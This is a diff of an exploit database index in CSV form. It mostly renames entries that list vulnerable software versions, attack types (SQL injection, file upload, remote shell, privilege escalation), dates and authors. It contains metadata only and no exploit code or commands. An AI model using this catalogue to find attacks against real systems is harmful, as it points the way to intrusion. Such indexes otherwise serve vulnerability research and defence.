30197,platforms/php/webapps/30197.txt,"WSPortal 1.0 - content.php SQL Injection",2007-06-18,"Jesper Jurcenoks",php,webapps,0 30198,platforms/asp/webapps/30198.txt,"TDizin - Arama.asp Cross-Site Scripting",2007-06-18,GeFORC3,asp,webapps,0 30199,platforms/cgi/webapps/30199.txt,"WebIf - OutConfig Parameter Local File Inclusion",2007-06-18,maiosyet,cgi,webapps,0 @@ -27103,7 +27104,7 @@ id,file,description,date,author,platform,type,port 30011,platforms/windows/remote/30011.rb,"Microsoft - Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,Metasploit,windows,remote,0 30012,platforms/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - (profile.php password0 Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 - (index.php language Parameter) SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 -30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell Exploit",2013-12-06,0_o,hardware,webapps,0 +30062,platforms/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Root Shell",2013-12-06,0_o,hardware,webapps,0 30063,platforms/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",php,webapps,0 30064,platforms/php/webapps/30064.txt,"HLstats 1.35 - hlstats.php Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",php,webapps,0 30065,platforms/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",php,webapps,0 @@ -27125,14 +27126,14 @@ id,file,description,date,author,platform,type,port 30081,platforms/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - news.asp Cross-Site Scripting",2007-05-24,vagrant,php,webapps,0 30082,platforms/php/webapps/30082.txt,"GNUTurk - Mods.php Cross-Site Scripting",2007-05-25,vagrant,php,webapps,0 30083,platforms/php/webapps/30083.txt,"BoxBilling 3.6.11 - (mod_notification) Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,php,webapps,0 -30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Remote File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 +30084,platforms/php/webapps/30084.php,"WordPress page-flip-image-gallery Plugins - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0 30091,platforms/linux/dos/30091.py,"OpenOffice 2.2 Writer Component - Remote Denial of Service",2007-05-28,shinnai,linux,dos,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - news.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 -30096,platforms/osx/local/30096.txt,"Apple Mac OS X 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 +30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 30099,platforms/php/webapps/30099.txt,"DGNews 2.1 - NewsID Parameter SQL Injection",2007-05-28,"laurent gaffie",php,webapps,0 @@ -27219,7 +27220,7 @@ id,file,description,date,author,platform,type,port 30292,platforms/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,php,webapps,0 -30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized manipulation",2007-07-12,bunker,multiple,local,0 +30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - Picture_Real_Edit.asp SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - errors/rights.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - errors/transaction.asp msg Parameter Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 @@ -27236,7 +27237,7 @@ id,file,description,date,author,platform,type,port 30387,platforms/php/webapps/30387.txt,"Vikingboard Viking board 0.1.2 - forum.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30388,platforms/php/webapps/30388.txt,"Vikingboard Viking board 0.1.2 - cp.php debug Variable Information Disclosure",2007-07-25,Lostmon,php,webapps,0 30389,platforms/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,php,webapps,0 -30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - UserName Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 +30390,platforms/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' Parameter SQL Injection",2007-07-26,"Aria-Security Team",php,webapps,0 30391,platforms/php/webapps/30391.txt,"PHPHostBot 1.05 - Authorize.php Remote File Inclusion",2007-07-26,S4M3K,php,webapps,0 30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' - Privilege Escalation",2013-12-17,Metasploit,windows,local,0 30308,platforms/windows/dos/30308.py,"PotPlayer 1.5.42509 Beta - Denial of Service (Integer Division by Zero Exploit)",2013-12-15,sajith,windows,dos,0 @@ -27335,7 +27336,7 @@ id,file,description,date,author,platform,type,port 30440,platforms/cgi/webapps/30440.txt,"WebEvent 4.03 - Webevent.cgi Cross-Site Scripting",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote,0 30442,platforms/php/webapps/30442.txt,"WebDirector - 'index.php' Cross-Site Scripting",2007-08-01,r0t,php,webapps,0 -30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download / File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 +30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download / File Deletion",2013-12-23,"Interference Security",php,webapps,80 30444,platforms/linux/dos/30444.txt,"KDE Konqueror 3.5.7 - Assert Denial of Service",2007-03-05,"Thomas Waldegger",linux,dos,0 30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module - MosConfig_absolute_path Remote File Inclusion",2007-08-02,Yollubunlar.Org,php,webapps,0 30446,platforms/asp/webapps/30446.txt,"Hunkaray Okul Portali 1.1 - Duyuruoku.asp SQL Injection",2007-08-02,Yollubunlar.Org,asp,webapps,0 @@ -27517,7 +27518,7 @@ id,file,description,date,author,platform,type,port 31913,platforms/windows/dos/31913.pl,"Music AlarmClock 2.1.0 - '.m3u' Crash (PoC)",2014-02-26,"Gabor Seljan",windows,dos,0 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 32705,platforms/windows/dos/32705.py,"EagleGet 1.1.8.1 - Denial of Service",2014-04-06,"Interference Security",windows,dos,0 -32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (64-bit) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0 +32277,platforms/linux/remote/32277.txt,"Nginx 1.4.0 (x64) - (Generic Linux) Remote Exploit",2014-03-15,sorbo,linux,remote,0 33984,platforms/hardware/webapps/33984.rb,"Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 @@ -27711,7 +27712,7 @@ id,file,description,date,author,platform,type,port 30762,platforms/php/webapps/30762.txt,"WP-SlimStat 0.9.2 WordPress Plugin - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0 -30765,platforms/osx/local/30765.c,"Apple Mac OS X 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 +30765,platforms/osx/local/30765.c,"Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution",2007-11-14,"Mark Tull",osx,local,0 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0 30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0 @@ -27727,7 +27728,7 @@ id,file,description,date,author,platform,type,port 30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30779,platforms/multiple/dos/30779.txt,"Rigs of Rods 0.33d - Long Vehicle Name Buffer Overflow",2007-11-19,"Luigi Auriemma",multiple,dos,0 30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 - Responder Privilege Escalation",2007-11-20,"Andrew Christensen",linux,local,0 -30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 +30781,platforms/osx/remote/30781.txt,"Apple Mac OSX 10.5.x - Mail Arbitrary Code Execution",2007-11-20,"heise Security",osx,remote,0 31026,platforms/hardware/remote/31026.pl,"Fortinet Fortigate - CRLF Characters URL Filtering Bypass",2008-01-14,Danux,hardware,remote,0 30974,platforms/multiple/dos/30974.txt,"Asterisk 1.x - BYE Message Remote Denial of Service",2008-01-02,greyvoip,multiple,dos,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 @@ -27972,7 +27973,7 @@ id,file,description,date,author,platform,type,port 31085,platforms/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,php,webapps,80 31086,platforms/php/webapps/31086.php,"AfterLogic Pro and Lite 7.1.1.1 - Persistent Cross-Site Scripting",2014-01-20,"Saeed reza Zamanian",php,webapps,80 31087,platforms/hardware/webapps/31087.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - Persistent Cross-Site Scripting",2014-01-20,"Rakesh S",hardware,webapps,80 -31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset Exploit",2014-01-20,KAI,hardware,webapps,80 +31088,platforms/hardware/webapps/31088.py,"BLUE COM Router 5360/52018 - Password Reset",2014-01-20,KAI,hardware,webapps,80 31090,platforms/windows/local/31090.txt,"MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()",2014-01-20,"Jean-Jamil Khalife",windows,local,0 31091,platforms/php/webapps/31091.txt,"Domain Trader 2.0 - 'catalog.php' Cross-Site Scripting",2008-02-02,Crackers_Child,php,webapps,0 31092,platforms/php/webapps/31092.txt,"WP-Footnotes 2.2 WordPress Plugin - Multiple Remote Vulnerabilities",2008-02-02,NBBN,php,webapps,0 @@ -28191,7 +28192,7 @@ id,file,description,date,author,platform,type,port 31299,platforms/jsp/webapps/31299.txt,"Alkacon OpenCMS 7.0.3 - 'tree_files.jsp' Cross-Site Scripting",2008-02-25,nnposter,jsp,webapps,0 31300,platforms/windows/dos/31300.txt,"Surgemail and WebMail 3.0 - 'Page' Command Remote Format String",2008-02-25,"Luigi Auriemma",windows,dos,0 31301,platforms/windows/dos/31301.txt,"Surgemail 3.0 - Real CGI executables Remote Buffer Overflow",2008-02-25,"Luigi Auriemma",windows,dos,0 -31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter NULL Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 +31302,platforms/windows/dos/31302.txt,"SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service",2008-02-25,"Luigi Auriemma",windows,dos,0 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component - 'id' Parameter SQL Injection",2008-02-25,The-0utl4w,php,webapps,0 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 - 'manager/xmedia.php' Cross-Site Scripting",2008-02-21,"Omer Singer",php,webapps,0 31308,platforms/android/dos/31308.html,"Android Web Browser - BMP File Integer Overflow",2008-03-04,"Alfredo Ortega",android,dos,0 @@ -28200,7 +28201,7 @@ id,file,description,date,author,platform,type,port 31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting",2008-02-28,"Richard Brain",hardware,remote,0 31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 - 'main.php' Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure",2008-02-28,"Richard Brain",cgi,webapps,0 -31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 +31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 - ''Username'' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0 31315,platforms/php/webapps/31315.txt,"XRms 1.99.2 - CRM 'msg' Parameter Cross-Site Scripting",2008-02-28,vijayv,php,webapps,0 31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 - color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0 31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0 @@ -28256,14 +28257,14 @@ id,file,description,date,author,platform,type,port 31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 - 'd_root' Parameter Local File Inclusion",2008-03-10,THE_MILLER,php,webapps,0 31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 - Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module - 'cat' Parameter SQL Injection",2008-03-10,Lovebug,php,webapps,0 -31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter NULL Pointer Denial Of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 +31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial Of Service",2008-03-10,"Luigi Auriemma",multiple,dos,0 31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 - watermark.php file Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 - catalog_watermark.php file Parameter Cross-Site Scripting",2008-03-10,ZoRLu,php,webapps,0 31381,platforms/windows/dos/31381.txt,"Motorola Timbuktu Pro 8.6.5 - Multiple Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",windows,dos,0 31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component - 'id' Parameter SQL Injection",2008-03-11,The-0utl4w,php,webapps,0 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' Parameter SQL Injection",2008-03-11,Houssamix,php,webapps,0 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' Parameter SQL Injection",2008-03-11,Lovebug,php,webapps,0 -31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' SEH Buffer Overflow ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 +31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH) ASLR + DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Inclusion",2008-03-12,muuratsalo,php,webapps,0 31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Inclusion",2008-03-12,muuratsalo,php,webapps,0 31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Parameter Cross-Site Scripting",2008-03-12,ZoRLu,php,webapps,0 @@ -28292,7 +28293,7 @@ id,file,description,date,author,platform,type,port 31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'Filename' Remote Buffer Overflow",2008-03-17,"Luigi Auriemma",windows,remote,0 31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component - 'category' Parameter SQL Injection",2008-03-17,The-0utl4w,php,webapps,0 31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting",2008-03-17,quentin.berdugo,cgi,webapps,0 -31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 +31412,platforms/osx/remote/31412.txt,"Apple Mac OSX Server 10.5 - Wiki Server Directory Traversal",2008-03-17,"Rodrigo Carvalho",osx,remote,0 31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting",2008-03-17,Berezniski,asp,webapps,0 31414,platforms/php/webapps/31414.txt,"phpStats 0.1_alpha - 'phpStats.php' Cross-Site Scripting",2008-03-18,"Hanno Boeck",php,webapps,0 31415,platforms/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 @@ -28302,7 +28303,7 @@ id,file,description,date,author,platform,type,port 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31423,platforms/windows/webapps/31423.txt,"IBM Business Process Manager - User Account Reconfiguration",2014-02-05,0in,windows,webapps,0 -31424,platforms/php/webapps/31424.txt,"WordPress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80 +31424,platforms/php/webapps/31424.txt,"WordPress Dandelion Theme - Arbitrary File Upload",2014-02-05,TheBlackMonster,php,webapps,80 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 @@ -28391,7 +28392,7 @@ id,file,description,date,author,platform,type,port 31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection",2014-02-07,"High-Tech Bridge SA",php,webapps,80 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 -31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' SEH Buffer Overflow",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 +31524,platforms/windows/local/31524.rb,"Publish-It 3.6d - '.pui' Buffer Overflow (SEH)",2014-02-08,"Muhamad Fadzil Ramli",windows,local,0 31525,platforms/php/webapps/31525.txt,"MyBB Extended Useradmininfo Plugin 1.2.1 - Cross-Site Scripting",2014-02-09,"Fikri Fadzil",php,webapps,80 31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80 31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 - 'postview.php' SQL Injection",2008-03-25,U238,php,webapps,0 @@ -28550,7 +28551,7 @@ id,file,description,date,author,platform,type,port 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem - Cross-Site Request Forgery",2014-02-16,"Dhruv Shah",hardware,webapps,80 -31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include",2014-02-16,Vulnerability-Lab,ios,webapps,8080 +31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Inclusion",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad EL Harmeel",windows,remote,0 @@ -28569,7 +28570,7 @@ id,file,description,date,author,platform,type,port 31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 -31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - 'username' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 +31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 - ''Username'' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0 31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 - Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0 31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 - footer.php Multiple Parameter Cross-Site Scripting",2008-05-02,"Khashayar Fereidani",php,webapps,0 @@ -28701,11 +28702,11 @@ id,file,description,date,author,platform,type,port 31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 -31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 - class/ApplyDB.php Unrestricted Arbitrary File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter Cross-Site Scripting",2008-05-26,Unohope,asp,webapps,0 31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 -31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 +31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0/12.0/12.1 - Remote Command Execution",2014-02-23,"Chris Graham",windows,remote,0 31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access",2008-05-26,Unohope,asp,webapps,0 31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,php,webapps,0 31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite",2008-05-28,Nine:Situations:Group,windows,dos,0 @@ -28756,7 +28757,7 @@ id,file,description,date,author,platform,type,port 31902,platforms/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps,0 31903,platforms/linux/remote/31903.asm,"NASM 2.0 - 'ppscan()' Off-by-One Buffer Overflow",2008-06-21,"Philipp Thomas",linux,remote,0 31904,platforms/php/webapps/31904.txt,"PHPEasyData 1.5.4 - annuaire.php annuaire Parameter SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 -31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php username Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 +31905,platforms/php/webapps/31905.txt,"PHPEasyData 1.5.4 - admin/login.php 'Username' Field SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps,0 31906,platforms/php/webapps/31906.txt,"PHPEasyData 1.5.4 - last_records.php annuaire Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31907,platforms/php/webapps/31907.txt,"PHPEasyData 1.5.4 - annuaire.php Multiple Parameter Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps,0 31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 @@ -28789,7 +28790,7 @@ id,file,description,date,author,platform,type,port 31937,platforms/php/local/31937.txt,"PHP 5.2.6 - chdir Function http URL Argument Safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 31938,platforms/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 -31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 +31940,platforms/osx/local/31940.txt,"Apple Mac OSX 10.x - Applescript ARDAgent Shell Privilege Escalation",2008-06-19,anonymous,osx,local,0 31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File 